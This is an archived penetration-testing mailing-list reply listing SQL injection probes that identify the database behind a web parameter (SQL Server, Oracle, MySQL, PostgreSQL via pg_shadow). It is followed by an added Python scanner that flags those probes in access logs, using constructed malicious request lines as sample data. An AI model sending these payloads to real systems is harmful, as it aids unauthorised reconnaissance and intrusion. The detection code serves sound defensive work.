Penetration Testing mailing list archives

RE: SQL injection (or not?)


From: Tonnerre Lombard <tonnerre.lombard () sygroup ch>
Date: Thu, 10 Aug 2006 06:31:08 +0200

Hi,

On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez wrote:
> Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a
>
> If it returns a valid value the database is SQL Server
>
> Parameter=[valid value]' and exists(select * from user_tables) and 'a'='a
>
> If it returns a valid value the database is Oracle
>
> Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a
>
> If it returns a valid value the database is MySQL

Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.

                                Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard () sygroup ch
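
Seen from the defending side, the catalog-table probes listed in this thread leave a recognizable pattern in web server logs. The following is an added example, not part of the original message: it flags request lines containing `exists(select ... from <catalog object>)` and reports which DBMS is being probed for. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Catalog objects named in the thread, mapped to the DBMS each probe identifies.
CATALOG_PROBES = {
    "sysobjects": "SQL Server",
    "user_tables": "Oracle",
    "mysql.user": "MySQL",
    "pg_shadow": "PostgreSQL",
}

# exists(select ... from <catalog object>), matched case-insensitively.
PROBE_RE = re.compile(
    r"exists\s*\(\s*select\b.{0,40}?\bfrom\s+("
    + "|".join(re.escape(name) for name in CATALOG_PROBES)
    + r")\b",
    re.IGNORECASE | re.DOTALL,
)

def normalize(raw):
    """URL-decode (twice, in case of double encoding) and squeeze whitespace."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text)

def scan(lines):
    """Return (line number, DBMS being probed for) for each matching line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = PROBE_RE.search(normalize(line))
        if match:
            findings.append((number, CATALOG_PROBES[match.group(1).lower()]))
    return findings

# Constructed request lines as they might appear in an access log.
SAMPLE_LOG = [
    "GET /item?id=7 HTTP/1.1",
    "GET /item?id=7'+and+exists(select+*+from+sysobjects)+and+'a'='a HTTP/1.1",
    "GET /item?id=7%27%20and%20exists%28select%20%2A%20from%20pg_shadow%29"
    "%20and%20%27a%27%3D%27a HTTP/1.1",
    "GET /search?q=mysql.user+table+permissions HTTP/1.1",  # benign mention
    "GET /item?id=7'+AND+EXISTS(SELECT+*+FROM+MYSQL.USER)+AND+'a'='a HTTP/1.1",
    "GET /item?id=7'+and+exists(select+*+from+user_tables)+and+'a'='a HTTP/1.1",
]

if __name__ == "__main__":
    for number, dbms in scan(SAMPLE_LOG):
        print(f"line {number}: catalog probe for {dbms}")
```

A hit on any of these lines means the parameter is worth reviewing for string concatenation into SQL; binding the value as a query parameter makes the whole probe a literal string.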
